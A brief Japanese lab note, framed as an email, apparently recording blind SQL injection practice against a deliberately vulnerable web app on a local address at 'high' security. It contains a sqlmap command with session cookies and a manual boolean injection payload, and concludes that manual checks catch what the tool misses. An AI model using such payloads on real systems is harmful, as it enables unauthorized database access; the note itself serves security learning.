Hello there,
セキュリティレベルを『high』へ。
現在のID:5 ⇨ 1へ。
Burp Suiteからクッキー情報とパラメータを取得して。
いつものように下記のsqlmapを実行してみて。
結果は、idでのインジェクションはできないとか。
sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/cookie-input.php#" --cookie="id=5; PHPSESSID=06nsu44nk0h52rmfmqdgbrdpq1; security=high" --data "id=1&Submit=Submit" -p id
なので、手動でインジェクションを実施してみることに。
6' or 1=1 #
存在しないIDなのに。
『exists』の文字が。
これがツールだけでは誤検知があるため。
手動での診断も併用して必要だということなのかも。
Best regards,